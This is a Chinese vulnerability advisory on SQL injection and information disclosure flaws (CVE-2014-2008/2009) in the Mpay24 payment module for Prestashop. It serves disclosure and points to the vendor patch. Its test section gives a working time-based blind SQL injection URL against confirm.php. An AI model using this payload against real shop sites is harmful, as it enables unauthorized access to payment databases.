发布日期：2014-09-03
更新日期：2014-09-04

受影响系统：

Mpay24 Mpay24 1.5

描述：

---

BUGTRAQ  ID: 69560
CVE(CAN) ID: CVE-2014-2008,CVE-2014-2009

Prestashop是电子商务解决方案。Mpay24是针对电子商务和移动电子商务在线支付系统。

Mpay24 Payment Module 1.5及其他版本在实现上存在信息泄露和SQL注入漏洞，成功利用后可使攻击者执行未授权数据库操作。

<*来源：Eldar Marcussen
  
  链接：http://seclists.org/fulldisclosure/2014/Sep/23
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/path/modules/mpay24/confirm.php?MPAYTID=1&amp;amp;STATUS=bbb&amp;amp;TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+

建议：

---

厂商补丁：

Mpay24
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

www.mpay24.com

浏览次数：2387
严重程度：0（网友投票）